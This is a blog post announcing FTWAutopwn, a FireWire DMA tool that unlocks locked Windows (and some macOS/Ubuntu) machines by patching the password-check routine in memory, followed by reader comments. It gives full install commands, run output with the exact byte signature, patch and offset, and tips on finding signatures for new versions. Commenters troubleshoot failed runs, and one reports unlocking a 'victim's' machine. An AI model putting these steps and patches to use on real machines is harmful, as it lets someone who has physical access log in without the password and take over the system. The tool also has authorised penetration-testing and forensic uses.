Update: FTWAutopwn is now named Inception: I’ve created a standalone page for the tool here, please be referred to that page for updates on the tool.
The last days I’ve been working on an alternative to winlockpwn (unlocking locked Windows boxes through FireWire SBP2 DMA) using libforensic1394. Now I’ve released an alpha version of the tool, Fire Through the Wire Autopwn (FTWAutopwn) at github. So here’s how to use it:
Check that your distro uses the new IEEE1394 stack
$ ls /dev | grep fw
If the new stack is loaded and the system has at least one FireWire port then `fw0` should be printed. Additional ports/devices will take the form fw<n>. If no devices are listed then it is likely that the new stack is not loaded. That sucks, try this command if you’re running Debian/Ubuntu:
sudo modprobe -r ohci1394 sbp2 eth1394 dv1394 raw1394 video1394 sudo modprobe firewire-ohci
Download and install libforensic1394
sudo apt-get install git cmake python3 wget https://freddie.witherden.org/tools/libforensic1394/releases/libforensic1394-0.2.tar.gz tar xvf libforensic1394-0.2.tar.gz cd libforensic1394-0.2 mkdir build cd build cmake -G"Unix Makefiles" ../ make sudo make install cd ../python sudo python3 setup.py install
Download and use FTWAutopwn
cd git clone https://github.com/carmaa/FTWAutopwn.git cd FTWAutopwn python3 ftwautopwn.py
The last command should now work. Hook up your attacking machine to a locked Windows 7 or XP machine using IEEE1394 FireWire cable, and run the above command. Select the correct target, and you’re off!
$ python3 ftwautopwn.py Fire Through the Wire Autopwn v.0.0.1 by Carsten Maartmann-Moe <[email protected]> 2011 For updates, check out https://github.com/carmaa/FTWAutopwn [+] Available targets: [1] Win7 32-bit msv1_0.dll technique [2] Win7 64-bit msv1_0.dll technique [3] WinXP SP2 msv1_0.dll technique [4] WinXP SP3 msv1_0.dll technique Please select target: 4 [+] You have selected: WinXP SP3 msv1_0.dll technique Using signature: 83f8107511b0018b Using patch: 83f8109090b0018b Using offset: 2146 [+] Searching for signature, 12 MiB so far. [+] Signature found at 0xd7d862. [+] Write-back verified; patching successful. Bon voyage!
You should now be able to log onto your target machine with any password.
Full syntax is provided by using the -h/–help switch:
$ python3 ftwautopwn.py -h Fire Through the Wire Autopwn v.0.0.1 by Carsten Maartmann-Moe <[email protected]> 2011 For updates, check out https://github.com/carmaa/FTWAutopwn Usage: ftwautopwn [OPTIONS] -d --delay=TIME: Delay attack by TIME seconds. This is useful in order to guarantee that the target machine has successfully installed the SBP2 device before attacking. If the attack fails, try to increase this value. -f --file=FILE: Use a file instead of FireWire bus data as input; for example to facilitate attacks on VMware machines or to ease testing and signature generation efforts -h, --help: Displays this message -l, --list: Lists available target operating systems -n, --no-write: Dry run, do not write back to memory -t TARGET, --target=TARGET: Specify target operating system (use --list to list available targets) -v/--verbose: Verbose mode
Koko
Hi. Good job but it seems thas it has dependecies problem…
python3 ftwautopwn.py -h
Traceback (most recent call last):
File “ftwautopwn.py”, line 7, in
from ftwautopwn import unlock
File “/home/bap-hmc/FTWAutopwn/ftwautopwn/unlock.py”, line 7, in
from forensic1394 import Bus
File “/usr/local/lib/python3.2/dist-packages/forensic1394/__init__.py”, line 1, in
from .bus import Bus
File “/usr/local/lib/python3.2/dist-packages/forensic1394/bus.py”, line 25, in
from forensic1394.functions import forensic1394_alloc, forensic1394_destroy, \
File “/usr/local/lib/python3.2/dist-packages/forensic1394/functions.py”, line 35, in
lib = cdll.LoadLibrary(loc)
File “/usr/lib/python3.2/ctypes/__init__.py”, line 418, in LoadLibrary
return self._dlltype(name)
File “/usr/lib/python3.2/ctypes/__init__.py”, line 340, in __init__
self._handle = _dlopen(self._name, mode)
OSError: libforensic1394.so.1: cannot open shared object file: No such file or directory
Do you already had this problem ? Any Solution ?
Thanks and regards.
Koko
Carsten
Let me guess: You’re using BackTrack? I ran into the same problem, it is not a dependency issue though. The trick is to set LD_LIBRARY_PATH to /usr/local/lib, where the libforensic1394 modules are:
export LD_LIBRARY_PATH=/usr/local/libLet me know if this doesn’t work.
koko
Hi,
No, I’m using the last ubuntu version (V 11.04).
I solved the problem by copying the libforensics library (libforensic1394.a, libforensic1394.so.0.2.0, libforensic1394.so and libforensic1394.so.1) into /usr/lib/
Then, it works perfectly !
Regards,
Koko
Mike
very cool. It worked against an XP SP3 machine. But it didn’t work against a W7 SP1, does the signature has to be updated for W7 SP1?
Carsten
What version of Win7 are you using (open a command shell and execute
winverto check and paste the whole ‘Version’ string here)? I’ll update the signatures/offsets if they’ve changed.mike
Hi Cartsen,
I noticed that you update the signature. I’ll give it a try. I also take a look the link listed below. Very informative. But I noticed the offset in your code is quite different. Any chance to share how you go about to find signatures, etc. ?
Carsten
Actually, the signatures is almost the same, the only difference is that I’ve chosen to include the previous ASM instruction (
cmp eax, 10h) in my signature (0x0F8550940000 in the article vs. 0x83F8100F85509400 in FTWAutopwn). When unlocking the screen through Metasploit it is also important to realize that Metesploit sees virtual address space as opposed to the physical address space seen by FTWAutopwn. That’s why the Metasploit looks for the entrance point to MsvpPasswordValidate first (the ‘sig’ variable in the array in the screen_unlock.rb script) before looking for the actual signature (the ‘orig_code’ variable).The method for finding signatures is really similar to to the method which is described in the article; it requires a bit of disassembly but nothing too advanced. I’ll try to do a write-up on it sometime in the future, right now I’m trying to implement autodetection of OS and Service Pack Level.
mike
Thanks. Carsten. Looking forward to it. I tried the new signature against a W7 Enterprise 64-bit. Version 6.1 (build 7601: Service Pack 1). Couple of things I don’t quite get.
1) initially the machine had 8G memory in it, with -v option, all most all the reads return 0
2) after I took out 4G memory, it seemed that I’m getting non-zeros. but still failed to find the signature.
My guess is that this is yet another version of the msv1_0.dll? I unfortunately haven’t got a ida pro that can do 64 bit dlls yet. But this is something I’m seriously like to learn. Looking forward to your write up.
Carsten
Hmm. Looks like the signature’s much less stable on x64. The offset of the signature as well as the address of the jnz jump that we’re NOPing out are changing frequently as Microsoft make changes to the code.
The main problem is that the jump address is > 46kB away from the jump code, so any change in the code in between will change the jump address. I’ll have to implement some kind of fuzzy matching in order to counter this. AFAIK the Win 7 32 bit signatures are stable for now, so for demo purposes I suggest attacking x32 architectures at the moment.
Carsten
Hi again Mike, just noticed that these blogs:
http://www.lestutosdenico.com/pentest/patch-ftwautopwn/
https://www.moonloop.org/bin/view/Moonloop/Article:k9iBW83eo9cBsdUlg7Red6cUaILIXVGw
have quite good write ups on how to locate signatures while I’m working on my own tutorial…
Michael Wu
Thanks. Carsten. I appreciate that. I watch your presentation @password^11 too. I then come to realize that you were also the author of interrogate, which I also used. Very cool stuff. Keep up the good work.
helper
http://astr0baby.wordpress.com/2011/09/20/unlocking-windows-7-sp1-locked-screen-remotely/
Mike
Very informative. I followed through using an xp sp3 version of the dll. Looks like I’ve got it. But I don’t get the purpose for this particular metasploit script. If I’ve already had a session on the box, what’s the point to unlock the screen?
Alex Cheng
Finally got my cable. Tested it but it threw me this error:
root@bt:/pentest/firewire/FTWAutopwn# python3.1 ftwautopwn.py
Fire Through the Wire Autopwn v.0.0.2
by Carsten Maartmann-Moe 2011
For updates, check out https://github.com/carmaa/FTWAutopwn
[+] Available targets:
[1] Windows 7 SP1 (x86) msv1_0.dll MsvpPasswordValidate technique
[2] Windows 7 SP1 (x64) msv1_0.dll MsvpPasswordValidate technique
[3] Windows 7 (x86) msv1_0.dll MsvpPasswordValidate technique
[4] Windows 7 (x64) msv1_0.dll MsvpPasswordValidate technique
[5] Windows Vista (x86) msv1_0.dll MsvpPasswordValidate technique
[6] Windows XP SP3 (x86) msv1_0.dll MsvpPasswordValidate technique
[7] Windows XP SP2 (x86) msv1_0.dll MsvpPasswordValidate technique
[8] Apple OS X 10.6.4 and lower (Intel x64) DoShadowHashAuth technique
[9] Ubuntu 9.04 (x86) Gnome lockscreen unlock
Please select target (or enter ‘q’ to quit): 6
[+] You have selected: Windows XP SP3 (x86) msv1_0.dll MsvpPasswordValidate technique
Phase 1:
Using signature: 0x83f8107511b0018b
Using patch: 0x83f8109090b0018b
Using offset: 0x8aa (2218)
Phase 2:
Using signature: 0x83f8107511b0018b
Using patch: 0x83f8109090b0018b
Using offset: 0×862 (2146)
Traceback (most recent call last):SBP2, please wait 1 seconds or press Ctrl+C
File “ftwautopwn.py”, line 78, in
main(sys.argv[1:])
File “ftwautopwn.py”, line 74, in main
unlock.run(ctx)
File “/pentest/firewire/FTWAutopwn/ftwautopwn/unlock.py”, line 128, in run
d = initialize_fw(d)
File “/pentest/firewire/FTWAutopwn/ftwautopwn/unlock.py”, line 253, in initialize_fw
d = b.devices()[0]
IndexError: list index out of range
Any idea? The winver of the tested machine is:
Version 5.1 (Build 2600.xpsp_sp3_gdr.111025-1629 : Service Pack 3)
Would love to try on the Vista but that machine does not have firewire… =(
Alex Cheng
Also, something weird happened. I logged in on my victim’s XP SP3 machine (meaning the Windows is not in lockscreen mode), and I re-run FTWautopwn. It managed to run (surprisingly), but the following happened:
[+] Initializing bus and enabling SBP2, please wait 1 seconds or press Ctrl+C
[*] Detecting memory size…
4096 MiB main memory detected
–snip–
[+] Searching for signature, 4096 MiB so far.
[+] Phase 2:
[+] Searching for signature, 131 MiB so far.
[-] Looks like we’re not getting any data. We could be outside memory
boundaries, or simply not have DMA. Try using -v/–verbose to debug.
Continue? [Y/n]: y
[+] Searching for signature, 146 MiB so far.
[-] Looks like we’re not getting any data. We could be outside memory
boundaries, or simply not have DMA. Try using -v/–verbose to debug.
Continue? [Y/n]: y
[+] Searching for signature, 238 MiB so far.
[+] Signature found at 0xee0f862.
[-] Write-back could not be verified; patching unsuccessful.
[!] Signature not found.
[!] Attack unsuccessful.
Sorry for spamming.
Carsten
Sorry for the late reply. Try the experimental version instead, and post again here if you run into trouble. That’s the ftwa.py command.
Alex Cheng
Cartsen, it works beautifully now! Thanks! =D (I have Mcafee running for the laptop I’m attempting to connect and it works)
Alex Cheng
Oops I mean Carsten =P Sorry for the typo